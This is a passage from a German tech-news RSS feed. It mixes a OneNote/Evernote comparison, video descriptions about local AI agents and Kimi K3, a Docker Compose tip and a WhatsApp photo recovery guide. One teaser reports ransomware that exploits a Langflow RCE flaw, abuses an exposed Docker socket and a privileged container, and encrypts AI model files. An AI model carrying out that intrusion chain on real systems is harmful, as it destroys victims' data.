<p class="wp-block-paragraph">OneNote synchronisiert seine Inhalte mit all Ihren Geräten und mit dem Internet über Microsoft OneDrive oder SharePoint. OneNote ist in <a href="https://www.computerwoche.de/article/3523691/microsoft-365-erklart.html" target="_blank">Microsoft 365</a> enthalten. Ohne M365-Abo erhalten Sie bis zu 5 GB Cloud-Speicherplatz. Zusätzlichen Speicherplatz können Sie zukaufen. Wenn Sie (oder Ihr Unternehmen) ein Microsoft-365-Abonnement abschließen, erhalten Sie wesentlich mehr Speicherplatz: zwischen 100 GB und 6 TB – je nachdem, für <a title="welchen Plan" href="https://www.microsoft.com/de-de/microsoft-365/buy/compare-all-microsoft-365-products" target="_blank" rel="noopener">welchen Plan</a> Sie sich entscheiden.</p>



<h2 class="wp-block-heading">Evernote: Web-Clipping-King</h2>



<p class="wp-block-paragraph"><a href="https://evernote.com/intl/de" title="Evernote" target="_blank" rel="noopener">Evernote</a> ist ein ganz anderes Kaliber als OneNote. Es bietet zwar die gleichen Grundfunktionalitäten: die Möglichkeit, Notizen zu erstellen, zu organisieren und mit mehreren Plattformen (<a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>, macOS, iPadOS, iOS, <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>, Web) zu synchronisieren. Dabei bietet die App im Vergleich zu OneNote allerdings eine signifikant farbenfrohere und einladendere Benutzeroberfläche – und eignet sich hervorragend, um Web-Content auszuschneiden und abzuspeichern.</p>



<p class="wp-block-paragraph">Der Startbildschirm von Evernote bietet diverse Widgets für den schnellen Zugriff auf Notizen, Notizbücher, kürzlich aufgenommene Bilder und vieles mehr. Ein zusätzliches Suchfeld garantiert zudem, dass Sie immer finden wonach Sie suchen. Die Widgets auf Ihrem Startbildschirm können Sie ganz nach Ihren Wünschen hinzufügen oder entfernen.</p>



<p class="wp-block-paragraph">Evernote bietet allerdings nicht annähernd so viele Werkzeuge zur Erstellung von Notizen wie OneNote. Zu den verfügbaren Features gehören zum Beispiel:</p>



<ul class="wp-block-list">
<li><p>Texte erstellen, bearbeiten und formatieren,</p></li>



<li><p>Tabellen, Dateien und Bilder einbetten,</p></li>



<li><p>Unterstützung für Touch-Devices und -Stifte,</p></li>



<li><p>Integrierbare Audio- und Videoaufnahmen und</p></li>



<li><p>Integration mit Google Calendar (für Outlook geplant) und Google Drive;</p></li>
</ul>



<p class="wp-block-paragraph"><strong>Web Clipping</strong></p>



<p class="wp-block-paragraph">Die Stärke von Evernote liegt wie eingangs bereits erwähnt darin, Inhalte aus dem weltweiten Netz zu erfassen und zu organisieren. Das dazu integrierte Web-Clipping-Tool funktioniert beispielhaft und läuft als Browser-Addon (für Chrome, Firefox, Internet Explorer, Microsoft Edge, Safari und Opera). Die Funktionen variieren dabei je nach Browser leicht. Im Allgemeinen bieten Google Chrome und Microsoft Edge dabei das zuverlässigste Erlebnis.</p>



<p class="wp-block-paragraph">Die Inhalte, die Sie mit Evernote aus dem Netz ziehen, lassen sich auch mit Tags versehen und zu Notizen hinzufügen. Darüber hinaus verfügt der Clipper auch über nützliche Markierungswerkzeuge für Screenshots. Erstellte Notizen dürfen selbstverständlich auf Knopfdruck mit spezifischen Kollegen oder auch über soziale Medien geteilt werden.</p>



<p class="wp-block-paragraph"><strong>Versionsunterschiede</strong></p>



<p class="wp-block-paragraph">Die <a class="idgGlossaryLink" href="https://www.computerwoche.de/operating-systems/" target="_blank">Windows</a>-, Mac-, iPadOS-, iOS-, <a class="idgGlossaryLink" href="https://www.computerwoche.de/mobile/" target="_blank">Android</a>– und Web-Versionen von Evernote weisen alle ein ähnliches Erscheinungsbild auf und verfügen über die gleichen Widgets und dasselbe Layout.</p>



<p class="wp-block-paragraph"><strong>KI-Funktionen</strong></p>



<p class="wp-block-paragraph">Auch Evernote integriert inzwischen künstliche Intelligenz. Zum Beispiel in Form von <a href="https://evernote.com/de-de/blog/ai-transcribe-audio-recordings-to-text" target="_blank" rel="noreferrer noopener">KI-Transkriptionen</a>, semantischen Suchen und auch in Form eines Assistenten:</p>



<figure class="wp-block-embed is-type-rich is-provider-x wp-block-embed-x"><div class="wp-block-embed__wrapper youtube-video">
<blockquote class="twitter-tweet" data-width="500" data-dnt="true"><p lang="en" dir="ltr">You’ve heard about Evernote v11, now see it in action. ⚡📹<br><br>Watch Product Lead <a href="https://x.com/fedesimio?ref_src=twsrc%5Etfw">@fedesimio</a> demo the new AI Assistant, Semantic Search, and AI Meeting Notes, and share the story of how Evernote got to v11.<br><br>We’re excited to start this new chapter together. V11 is available for… <a href="https://t.co/9d8DMmRVLF">pic.twitter.com/9d8DMmRVLF</a></p>— Evernote (@evernote) <a href="https://x.com/evernote/status/2016198369727717768?ref_src=twsrc%5Etfw">January 27, 2026</a></blockquote>
</div></figure>



<p class="wp-block-paragraph"><strong>Storage und Preisgefüge</strong></p>



<p class="wp-block-paragraph">Die Basisversion von Evernote ist kostenlos, jedoch auf 60 MB neue Notizen pro Monat sowie die Synchronisierung zwischen zwei Geräten limitiert – und enthält keine erweiterten Funktionen.</p>



<p class="wp-block-paragraph"><a title="Personal- und Professional-Abos" href="https://evernote.com/intl/de/compare-plans" target="_blank" rel="noopener">Abonnement-Pläne</a> erschließen weitere Features, beispielsweise die Möglichkeit, Notizen in Präsentationen umzuwandeln, PDFs und Anhänge zu durchsuchen und die Integration mit weiteren Services wie Slack und Microsoft Teams.</p>



<ul class="wp-block-list">
<li><p>Das Starter-Abo richtet sich dabei an Einzel- beziehungsweise Privatpersonen und kostet 6,65 Euro pro Monat (oder 79,90 Euro pro Jahr).</p></li>



<li><p>Das Advanced-Abo ist auf Power User ausgelegt und kostet 16,66 Euro pro Monat (oder 199,99 Euro jährlich).</p></li>



<li><p>Enterprise-Pläne werden hingegen individuell auf das jeweilige Unternehmen zugeschnitten und bieten unter anderem gemeinsame Arbeitsbereiche, dedizierten Support und zentrale Management-Tools.</p></li>
</ul>



<h2 class="wp-block-heading">OneNote oder Evernote?</h2>



<p class="wp-block-paragraph">Wenn Sie in erster Linie ein Tool suchen, mit dem Sie auf einfache Weise Inhalte aus dem Internet erfassen, organisieren und finden können, sollten Sie zu <strong>Evernote</strong> greifen. Wollen Sie einfach nur Notizen erstellen und diese bestmöglich organisieren – oder nutzen bereits Microsoft 365 – dann dürften Sie mit <strong>OneNote</strong> glücklich werden. Oder Sie verwenden beide Apps einfach in Kombination. (fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Beitrag ist <a href="https://www.computerworld.com/article/1508044/onenote-vs-evernote-note-taking-apps.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Computerworld.com erschienen.</strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Langflow RCE: ENCFORGE verschlüsselt KI-Modelle, Vektoren und Trainingsdaten]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Eine Folgeattacke auf dieselbe Langflow-Instanz nutzt die RCE-Schwachstelle CVE-2025-3248, um nun speziell KI-Artefakte zu verschlüsseln. Der neue Go-Locker ENCFORGE zielt auf Model-Weights, Vektorindizes und Trainingsdaten quer über das Host-Dateisystem. Dabei baut der Ang...]]></description>
<link>https://tsecurity.de/de/3685038/it-security-nachrichten/langflow-rce-encforge-verschluesselt-ki-modelle-vektoren-und-trainingsdaten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685038/it-security-nachrichten/langflow-rce-encforge-verschluesselt-ki-modelle-vektoren-und-trainingsdaten/</guid>
<pubDate>Wed, 22 Jul 2026 02:12:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-encforge-langflow-rce.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-encforge-langflow-rce.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-encforge-langflow-rce-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-encforge-langflow-rce-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-encforge-langflow-rce-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-encforge-langflow-rce-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-encforge-langflow-rce-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Eine Folgeattacke auf dieselbe Langflow-Instanz nutzt die RCE-Schwachstelle CVE-2025-3248, um nun speziell KI-Artefakte zu verschlüsseln. Der neue Go-Locker ENCFORGE zielt auf Model-Weights, Vektorindizes und Trainingsdaten quer über das Host-Dateisystem. Dabei baut der Angreifer den Zugriff über den freigelegten Docker-Socket und startet einen privilegierten Container, um Prozesse und Daten auf dem Host […]</p>
<div><a href="https://www.it-boltwise.de/langflow-rce-encforge-verschluesselt-ki-modelle-vektoren-und-trainingsdaten.html">... den vollständigen Artikel <strong>»Langflow RCE: ENCFORGE verschlüsselt KI-Modelle, Vektoren und Trainingsdaten«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/langflow-rce-encforge-verschluesselt-ki-modelle-vektoren-und-trainingsdaten.html">Langflow RCE: ENCFORGE verschlüsselt KI-Modelle, Vektoren und Trainingsdaten</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Phishing-Explosion: Quishing +146%, Smishing +162% in H1 2026 - Ad-hoc-news.de]]></title>
<description><![CDATA[... Hacker und Datenmissbrauch absichern. So sichern Sie Ihr Android-Smartphone in wenigen Minuten gegen Hacker ab – kostenlos. Besonders betroffen ...]]></description>
<link>https://tsecurity.de/de/3684428/hacking/phishing-explosion-quishing-146-smishing-162-in-h1-2026-ad-hoc-newsde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684428/hacking/phishing-explosion-quishing-146-smishing-162-in-h1-2026-ad-hoc-newsde/</guid>
<pubDate>Tue, 21 Jul 2026 18:55:13 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... <b>Hacker</b> und Datenmissbrauch absichern. So sichern Sie Ihr Android-Smartphone in wenigen Minuten gegen <b>Hacker</b> ab – kostenlos. Besonders betroffen ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Rund 570-Millionen-Blockbuster vom &quot;Deadpool 3&quot;-Macher: Dieses Fantasy-Abenteuer mit Ben Stiller läuft heute kostenlos im TV]]></title>
<description><![CDATA[Bevor er Deadpool & Wolverine auf die Leinwand brachte, schuf Shawn Levy diesen 570-Millionen-Hit. Heute läuft das Fantasy-Spektakel gratis im TV.
																					Dieser Artikel wurde einsortiert unter 
																	TV-Serie / Webserie,																	kabel eins,																	Serien,...]]></description>
<link>https://tsecurity.de/de/3684335/it-nachrichten/rund-570-millionen-blockbuster-vom-quotdeadpool-3quot-macher-dieses-fantasy-abenteuer-mit-ben-stiller-laeuft-heute-kostenlos-im-tv/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684335/it-nachrichten/rund-570-millionen-blockbuster-vom-quotdeadpool-3quot-macher-dieses-fantasy-abenteuer-mit-ben-stiller-laeuft-heute-kostenlos-im-tv/</guid>
<pubDate>Tue, 21 Jul 2026 18:18:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Bevor er Deadpool &amp; Wolverine auf die Leinwand brachte, schuf Shawn Levy diesen 570-Millionen-Hit. Heute läuft das Fantasy-Spektakel gratis im TV.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/serien/index.html">TV-Serie / Webserie</a>,																	<a href="https://www.netzwelt.de/tv-sender/kabel-eins.html">kabel eins</a>,																	<a href="https://www.netzwelt.de/serien/index.html">Serien</a>,																	<a href="https://www.netzwelt.de/disney-plus/index.html">Disney+</a>,																	<a href="https://www.netzwelt.de/tv-show/tv-programm/index.html">TV-Tipps heute: Das Fernsehprogramm &amp; Highlights</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[KI-Agenten lokal & kostenlos: LM Studio Bionic als Alternative zu ChatGPT Codex, Claude Cowork & Co.]]></title>
<description><![CDATA[Author: Digitale Profis - Bewertung: 6x - Views:57 Hier geht's zum Download: https://lmstudio.ai/bionic
Artikel: https://digitaleprofis.de/lm-studio-bionic-im-test/

LM Studio Bionic soll offene KI-Modelle in lokale KI-Agenten verwandeln. Im Praxistest lassen wir Qwen 3.6 35B drei Dateien analysi...]]></description>
<link>https://tsecurity.de/de/3684004/ai-nachrichten/ki-agenten-lokal-kostenlos-lm-studio-bionic-als-alternative-zu-chatgpt-codex-claude-cowork-co/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684004/ai-nachrichten/ki-agenten-lokal-kostenlos-lm-studio-bionic-als-alternative-zu-chatgpt-codex-claude-cowork-co/</guid>
<pubDate>Tue, 21 Jul 2026 16:19:52 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Digitale Profis - Bewertung: 6x - Views:57 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/Zl7JMGvXX-E?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Hier geht's zum Download: https://lmstudio.ai/bionic<br />
Artikel: https://digitaleprofis.de/lm-studio-bionic-im-test/<br />
<br />
LM Studio Bionic soll offene KI-Modelle in lokale KI-Agenten verwandeln. Im Praxistest lassen wir Qwen 3.6 35B drei Dateien analysieren und daraus eine Markdown-Auswertung sowie eine PowerPoint-Präsentation erstellen.<br />
<br />
Das Ergebnis entsteht lokal auf einem Mac mini M2 Pro, mit korrekten Kennzahlen aus 36 Feedbackbögen, aber auch rund 20 Minuten Laufzeit und einigen klaren Grenzen.<br />
Wir zeigen euch, wie Work- und Code-Projekte funktionieren, wie ihr zwischen lokalen Modellen, einem eigenen Server und der LM Studio Cloud wählen könnt und wie transparent Bionic seine einzelnen Arbeitsschritte darstellt. Anschließend prüfen wir die erstellte Auswertung und Präsentation auf Inhalt, Daten und Gestaltung.<br />
<br />
Im Video:<br />
Work Projects und Code Projects<br />
Lokale Modelle, LM Link und Cloud-Modelle<br />
Kosten und Datenschutz<br />
Qwen 3.6 35B auf dem Mac mini<br />
Analyse von Briefing, Feedback und Branding<br />
Markdown-Auswertung und PowerPoint im Ergebnischeck<br />
Stärken, Schwächen und aktuelle Grenzen<br />
<br />
Werde Kanalmitglied und unterstütze damit unsere Arbeit:<br />
https://www.youtube.com/channel/UCv90NdTyTp7ZPPRvvSZaS5w/join<br />
<br />
Videoinhalt:<br />
00:00 Was ist LM Studio Bionic?<br />
00:43 Projektarten und Model Picker<br />
01:47 Download, Kosten und Datenschutz<br />
03:33 Work-Projekt einrichten<br />
04:25 Lokales Modell auswählen und installieren<br />
06:03 Modell, Dateien und Testauftrag<br />
07:28 Bionic arbeitet mit den Dateien<br />
08:09 Ergebnis nach 20 Minuten<br />
09:02 Markdown und Daten im Check<br />
09:23 PowerPoint-Präsentation im Check<br />
10:37 Fazit: Leistung, Datenschutz und Grenzen<br />
<br />
Videovorschläge, Feedback und Kritik kannst Du uns jederzeit in den Kommentaren mitteilen!<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Das ist der Deepseek 2.0 Moment]]></title>
<description><![CDATA[Author: The Morpheus Tutorials - Bewertung: 21x - Views:188 Kimi K3 zeigt, dass Open Weight Modelle definitiv nichht mehr weit weg sind von den besten der besten.

Quellen:
https://www.kimi.com/blog/kimi-k3
https://platform.kimi.ai/docs/guide/kimi-k3-quickstart
https://x.com/Kimi_Moonshot/status/...]]></description>
<link>https://tsecurity.de/de/3683973/video/das-ist-der-deepseek-20-moment/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683973/video/das-ist-der-deepseek-20-moment/</guid>
<pubDate>Tue, 21 Jul 2026 16:12:27 +0200</pubDate>
<category>🎥 Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: The Morpheus Tutorials - Bewertung: 21x - Views:188 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/vqNvkkhyEms?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Kimi K3 zeigt, dass Open Weight Modelle definitiv nichht mehr weit weg sind von den besten der besten.<br />
<br />
Quellen:<br />
https://www.kimi.com/blog/kimi-k3<br />
https://platform.kimi.ai/docs/guide/kimi-k3-quickstart<br />
https://x.com/Kimi_Moonshot/status/2078855608565207130<br />
https://x.com/cramforce/status/2078574147333152957<br />
https://www.blender.org/lab/mcp-server/<br />
https://openrouter.ai/moonshotai/kimi-k3<br />
<br />
Blender Benchmark auf Github: <br />
https://github.com/TheMorpheus407/hogwarts-blender-benchmark<br />
<br />
MorphCook Benchmark auf Github:<br />
https://github.com/TheMorpheus407/morphcook/<br />
<br />
MorphCook:<br />
https://play.google.com/store/apps/details?id=de.themorpheus.morphcook<br />
<br />
Zum MorphReader: <br />
Android: https://play.google.com/store/apps/details?id=de.themorpheus.morph_reader_app<br />
Apple: https://apps.apple.com/de/app/morphreader/id6741467699?platform=iphone<br />
<br />
RSS Feed: https://www.patreon.com/collection/880029?view=expanded<br />
<br />
Instagram: https://www.instagram.com/themorpheustuts/<br />
<br />
Meine anderen Kanäle und Projekte: the-morpheus.de/<br />
<br />
_Selbst *kostenlos Informatik lernen* auf meiner Website:_ https://bootstrap.academy/<br />
<br />
_Discord:_<br />
https://the-morpheus.de/discord.html<br />
<br />
_Unterstützt mich - Danke!:_<br />
https://www.patreon.com/user?u=5322110<br />
https://www.paypal.me/TheMorpheus<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Git Pull Kept Failing on My Ghost Server. Docker Compose Override Fixed It]]></title>
<description><![CDATA[Modifying your docker-compose.yml directly and now git pull throws a "local changes would be overwritten" error? Use a compose.override.yml file to keep your changes separate from the file Ghost's repo manages.]]></description>
<link>https://tsecurity.de/de/3683935/linux-tipps/git-pull-kept-failing-on-my-ghost-server-docker-compose-override-fixed-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683935/linux-tipps/git-pull-kept-failing-on-my-ghost-server-docker-compose-override-fixed-it/</guid>
<pubDate>Tue, 21 Jul 2026 15:54:15 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Modifying your docker-compose.yml directly and now git pull throws a "local changes would be overwritten" error? Use a compose.override.yml file to keep your changes separate from the file Ghost's repo manages.]]></content:encoded>
</item>
<item>
<title><![CDATA[Whatsapp-Fotos gelöscht: So stellen Sie Bilder und Videos wieder her]]></title>
<description><![CDATA[Gelöschte Whatsapp-Fotos und -Videos lassen sich in vielen Fällen wiederherstellen – über das lokale Dateisystem, ein Google-Drive-Backup oder die iCloud. Welche Methode für Sie die richtige ist, hängt von Ihrem Betriebssystem ab und davon, ob Sie Whatsapp-Backups aktiviert haben. Wir führen Sie ...]]></description>
<link>https://tsecurity.de/de/3683896/windows-tipps/whatsapp-fotos-geloescht-so-stellen-sie-bilder-und-videos-wieder-her/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683896/windows-tipps/whatsapp-fotos-geloescht-so-stellen-sie-bilder-und-videos-wieder-her/</guid>
<pubDate>Tue, 21 Jul 2026 15:43:50 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Gelöschte Whatsapp-Fotos und -Videos lassen sich in vielen Fällen wiederherstellen – über das lokale Dateisystem, ein Google-Drive-Backup oder die iCloud. Welche Methode für Sie die richtige ist, hängt von Ihrem Betriebssystem ab und davon, ob Sie Whatsapp-Backups aktiviert haben. Wir führen Sie Schritt für Schritt durch alle Optionen.</p>



<h2 class="wp-block-heading toc">Schnell-Check: Ist das Bild wirklich weg?</h2>



<p>Bevor Sie aufwendige Wiederherstellungsversuche starten, sollten Sie zuerst zwei kurze Checks durchführen. Manchmal ist die Lösung nämlich viel einfacher, als wir denken:</p>



<ul class="wp-block-list">
<li><strong>Galerie prüfen:</strong> Öffnen Sie Ihre Fotos- oder Galerie-App und suchen Sie dort nach dem Album “Whatsapp” oder “Whatsapp Images”. In manchen Fällen wird ein Bild nur im Chat nicht mehr angezeigt, ist aber noch vollständig im Speicher Ihres Handys vorhanden. Voraussetzung ist, dass die automatische Medienspeicherung in Whatsapp aktiviert ist. Mehr dazu in unserem Artikel <a href="https://www.pcwelt.de/article/2982577/whatsapp-speicher-aufraeumen-dateien-sicher-loeschen-android-ios.html" target="_blank" rel="noreferrer noopener">Whatsapp-Speicher aufräumen: So löschen Sie unnötige Dateien sicher</a>.</li>



<li><strong>Erneut herunterladen:</strong> Öffnen Sie den betreffenden Whatsapp-Chat. Falls Sie anstelle des Bildes nur eine verschwommene Vorschau mit einem Download-Pfeil sehen, tippen Sie darauf. Whatsapp lädt das Bild erneut von seinen Servern, sofern es noch nicht zu lange zurückliegt.</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage center"><figure data-wp-context='{"imageId":"6a5f77805b291"}' data-wp-interactive="core/image" class="wp-block-image aligncenter size-full is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/WhatsApp-Image-2026-07-02-at-3.20.18-PM.jpeg?quality=50&amp;strip=all" alt="Whatsapp-Bilder im Chat erneut herunterladen" class="wp-image-3183566" width="1024" height="1077" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Gelöschte Whatsapp-Fotos: Wenn das Bild im Chat verschwommen ist, können Sie es per Antippen noch einmal herunterladen.</p>
</figcaption></figure><p class="imageCredit">PC-Welt</p></div>



<p>Bleibt das Bild trotz der Checks unauffindbar, haben Sie noch weitere Möglichkeiten. Die wichtigsten stellen wir Ihnen in den folgenden Abschnitten vor.</p>



<h2 class="wp-block-heading toc">Methode 1: Dateisystem durchsuchen (Android)</h2>



<p>Auch wenn ein Bild aus dem Whatsapp-Chat gelöscht wurde und nicht mehr in der Galerie auftaucht, kann es sich noch im Dateisystem des Smartphones befinden. Auf Android legt Whatsapp Mediendateien im internen Speicher unter folgendem Pfad ab: <strong>Interner Speicher → Android → media → com.whatsapp → WhatsApp → Media → WhatsApp Images</strong>. Für Videos schauen Sie entsprechend im Ordner “WhatsApp Video” nach.</p>



<p>Um in diesen Ordner zu gelangen, benötigen Sie einen Dateimanager. Auf neueren Android-Versionen reicht dafür oft die vorinstallierte App <a href="https://play.google.com/store/apps/details?id=com.google.android.apps.nbu.files&amp;hl=de" target="_blank" rel="noreferrer noopener">Dateien</a> aus, alternativ funktionieren kostenlose Apps wie der <a href="https://play.google.com/store/apps/details?id=com.ghisler.android.TotalCommander&amp;hl=de" target="_blank" rel="noreferrer noopener">Total Commander</a> aus dem Play Store. Gehen Sie dann so vor:</p>



<ol class="wp-block-list">
<li>Öffnen Sie die App <strong>Dateien</strong> oder einen Dateimanager Ihrer Wahl.</li>



<li>Navigieren Sie zu <strong>Interner Speicher → Android → media → com.whatsapp → WhatsApp → Media</strong>.</li>



<li>Öffnen Sie den Ordner <strong>Whatsapp Images</strong> für Fotos oder <strong>WhatsApp Video</strong> für Videos.</li>



<li>Suchen Sie dort nach der gewünschten Datei und kopieren Sie sie an einen sicheren Ort.</li>
</ol>



<p><strong>Wichtig:</strong> Diese Methode funktioniert nur, wenn das Bild zwar aus dem Chatverlauf entfernt, aber die lokal gespeicherte Kopie noch nicht überschrieben wurde. Je länger Sie warten, desto unwahrscheinlicher wird ein Erfolg.</p>



<h2 class="wp-block-heading toc">Methode 2: Backup wiederherstellen (Android &amp; iPhone)</h2>



<p>Wenn das Bild weder in der Galerie noch im Dateisystem zu finden ist, bleibt der Weg über ein Backup. Whatsapp sichert Chats und Mediendateien regelmäßig automatisch – auf Android in Google Drive und auf dem iPhone in der iCloud. Entscheidend ist, dass das Backup vor dem Löschen des Bildes erstellt wurde.</p>



<p>Prüfen Sie zunächst, wie weit das letzte Backup zurückliegt: Öffnen Sie Whatsapp und navigieren Sie zu <strong>Einstellungen → Chats → Chat-Backup</strong>. Dort sehen Sie Datum und Uhrzeit der letzten Sicherung. Liegt dieses Datum vor dem Zeitpunkt, an dem das Bild gelöscht wurde, sind Ihre Chancen gut.</p>



<p><strong>Gehen Sie dann so vor:</strong></p>



<ol class="wp-block-list">
<li>Deinstallieren Sie Whatsapp. Halten Sie dazu das App-Symbol gedrückt und tippen Sie auf <strong>Deinstallieren</strong> (Android) oder <strong>App entfernen</strong> (iPhone).</li>



<li>Laden Sie Whatsapp neu herunter und installieren Sie die App.</li>



<li>Melden Sie sich mit Ihrer Telefonnummer an. Whatsapp erkennt das vorhandene Backup automatisch.</li>



<li>Tippen Sie auf <strong>Wiederherstellen</strong>, um Chats und Medien zurückzuholen.</li>
</ol>



<p><strong>Achtung:</strong> Alle Nachrichten und Medien, die nach dem letzten Backup eingegangen sind, gehen bei diesem Vorgang verloren.</p>



<h2 class="wp-block-heading toc">Sonderfall: Das Bild wurde “für alle” gelöscht</h2>



<p>Whatsapp erlaubt es, versendete Nachrichten nachträglich bei allen Empfängern zu entfernen. Hat der Absender ein Bild mit “Für alle löschen” entfernt, erscheint im Chat nur noch der Hinweis “Dieses Medium wurde gelöscht”. Weder Backup noch Dateisystem helfen hier weiter, da das Bild nie dauerhaft auf Ihrem Gerät gespeichert wurde.</p>



<p>Eine Ausnahme gibt es: Hatte Ihr Handy das Bild bereits automatisch in der Galerie gespeichert, bevor der Absender es gelöscht hat, ist diese Kopie weiterhin vorhanden. Whatsapp entfernt bei “Für alle löschen” nur die Kopie im Chat, nicht eine bereits in der Galerie gesicherte Version. Mehr zum Thema <a href="https://www.pcwelt.de/article/1195099/whatsapp-trick-geloeschte-nachrichten-trotzdem-lesen.html" target="_blank" rel="noreferrer noopener">Gelöschte Whatsapp-Nachrichten und wie Sie diese trotzdem lesen können, erfahren Sie hier</a>.</p>



<h2 class="wp-block-heading toc">Datenrettungs-Software: Finger weg oder sinnvoll?</h2>



<p>Im Netz werden zahlreiche Tools beworben, die angeblich gelöschte Whatsapp-Fotos direkt aus dem Speicher retten; darunter “Dr.Fone”, “PhoneRescue” oder “Tenorshare UltData”. </p>



<p>Viele werben damit, ohne Root-Zugriff auszukommen. Das stimmt – mit einer wichtigen Einschränkung: Was diese Tools in der Praxis hauptsächlich tun, ist, den Inhalt eines vorhandenen Google-Drive- oder iCloud-Backups auszulesen und selektiv wiederherzustellen. Das ist durchaus praktisch, hilft aber nur, wenn das gesuchte Bild im Backup enthalten war.</p>



<p>Eine echte Wiederherstellung gelöschter Dateien direkt aus dem freien Gerätespeicher (also ohne jegliches Backup) ist auf modernen Android-Geräten durch das Betriebssystem stark eingeschränkt und gelingt in der Praxis selten zuverlässig. Unser Rat: Bleiben Sie skeptisch, denn die Preise für solche Tools sind oft hoch und die Erfolgsaussichten gering.</p>



<h2 class="wp-block-heading toc">So verlieren Sie künftig keine Whatsapp-Medien mehr</h2>



<p>Der zuverlässigste Schutz vor Datenverlust ist und bleibt ein aktuelles Backup. Aktivieren Sie in Whatsapp unter <strong>Einstellungen → Chats → Chat-Backup</strong> die tägliche automatische Sicherung und stellen Sie sicher, dass Ihr Google- oder Apple-Account genug freien Speicher hat. </p>



<p>Zusätzlich empfiehlt es sich, die <strong>automatische Medienspeicherung aktiviert zu lassen</strong>, damit Fotos direkt in der Galerie landen und damit eine zweite Kopie außerhalb des Chats existiert. Bedenken Sie dabei nur, dass das den Speicher schnell füllen kann.</p>



<p><strong>Weiterführender Lesetipp:</strong> <a href="https://www.pcwelt.de/article/2681721/12-neue-whatsapp-funktionen-die-sie-ab-sofort-nutzen-konnen.html" data-type="link" data-id="https://www.pcwelt.de/article/2681721/12-neue-whatsapp-funktionen-die-sie-ab-sofort-nutzen-konnen.html" target="_blank" rel="noreferrer noopener">12 neue Whatsapp-Funktionen, die Sie ab sofort nutzen können</a></p>



<div class="wp-block-idg-base-theme-faq-block faq-block"><h2 class="faq-block-title"> FAQ – Whatsapp-Medien wiederherstellen </h2><hr class="block-horizotal-divider">
